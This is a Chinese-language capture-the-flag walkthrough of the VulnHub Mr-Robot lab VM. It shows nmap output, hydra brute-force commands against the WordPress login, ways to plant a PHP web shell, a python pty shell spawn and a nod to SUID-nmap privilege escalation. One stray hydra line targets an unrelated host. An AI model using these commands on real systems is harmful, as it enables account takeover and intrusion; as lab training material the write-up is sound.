0%

Vulnhub-MrRobot

在线靶机链接:MrRobot
下载链接:MyRobot:1

靶机难度:简单/中等

这是一个MrRobot主题的靶机。
MrRobot是以网络安全题材的一部美剧(还挺好看的。

信息枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ nmap -sV -p- -sC -T5 192.168.56.135
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 16:47 CST
Nmap scan report for 192.168.56.135
Host is up (0.00056s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.86 seconds

目标机器开放了2个端口。

我们只能得知他开放了一个网站,探测一下网站根目录,

gobuster

哦,有robots,先去看下有什么东西。
robots

emmmm,拿到第一个flag了。

还有一个有趣的东西,下载下来看看。
facto

看起来是个字典,可能在之后会用到。

访问一下网站
index

这个网站很有趣,虽然我们在上面找不到什么信息。

爆破密码

访问一下login后台,会发现是wordpress博客。

wordpress

invalid

输入admin,admin登录会发现提示是无效的用户名,而且网站没有限制错误次数登录。

加上我在网站的其他地方也没找到线索了,只能尝试爆破了,甚至还被耍了QAQ
readme
先爆破出正确的用户名。我用的是hydra爆破

1
hydra -L ~/Downloads/fsocity.dic -p test -s 80 192.168.56.135 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.135%2Fwp-admin%2F&testcookie=1:F=Invalid username"

username
爆破出正确的用户名后,爆破密码。

1
hydra -l Elliot -P ~/Downloads/fsocity.dic  -s 80 192.168.56.135 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.56.135%2Fwp-admin%2F&testcookie=1:S=302"

这里我爆破了5个小时。。。估计是没设置线程的原因把。(电脑太垃圾了把
passwd

hydra -l Bill -P ~/Desktop/wordlists/rockyou.txt -s 8001 10.10.121.11 http-post-form “/:j_username=^USER^&j_password=^PASS^&from=/&Submit=Sign in:S=302”

上传web—shell

成功登录,刚好我之前做过一次wordpress拿shell的靶机。上传方法有三种

  • 直接修改模板php,插入一句话
  • 安装wordpress主题,主题夹带我们的shell。安装成功后访问页面。
  • 安装插件 同上
    login

提权

nc开启监听后,访问
get-shell

进去之后我先查看了有哪个用户,进去了他的家目录下拿了第二个flag
flag

同时我们也拿到了robot用户的md5字段。
使用hashcat或者在线破解md5网站,进行爆破。

在webshell下打开一个交互性shell 目的是使我们能够切换用户,使用补全命令等。

1
python -c 'import pty;pty.spawn("/bin/bash")'

使用sudo -l 查看有没有sudo权限。很显然是没有的
sudo

查看suid位文件
suid

嗯?发现了nmap。nmap也是可以执行命令的。
so?how to do?

nmap-root

拿到最终flag。
flag3

总结

学会了nmap提权